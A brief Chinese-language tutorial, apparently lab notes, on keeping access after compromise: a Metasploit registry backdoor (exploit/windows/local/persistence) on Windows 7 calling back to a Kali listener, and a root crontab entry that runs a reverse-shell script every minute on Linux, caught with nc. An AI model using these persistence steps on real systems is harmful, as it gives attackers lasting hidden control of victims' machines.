1、windows权限维持 注册表后门
首先拿到msf的shell后
background退出
然后选择注册表后门模块
use exploit/windows/local/persistence
选择好攻击模块设置参数
这里设置的是攻击机本机的ip和端口
记得设置会话
然后运行
生成的rc文件是用来清除后门的
win7 已经生成vbs后门
注册表也被修改了
回到kali的msf中
记得设置的地址和端口和之前在注册表后门设置的相同
将windows7重新启动
开机成功后 注册表后门会自动运行
win7 成功上线
2、linux权限维持 计划任务反弹shell
使用crontab命令进行反弹shell。crontab命令用于设置周期性被执行的指令。新建shell脚本,利用脚本进行反弹
并更改文件权限,使得文件可以被执行
添加计划任务(记得要以root权限更改文件)
vim /etc/crontab
设置反弹shell任务每分钟执行一次
要对应好文件的绝对路径
*/1 * * * * root /home/yan/Desktop/work/shell.sh
kali使用nc启动监听
成功监听到shell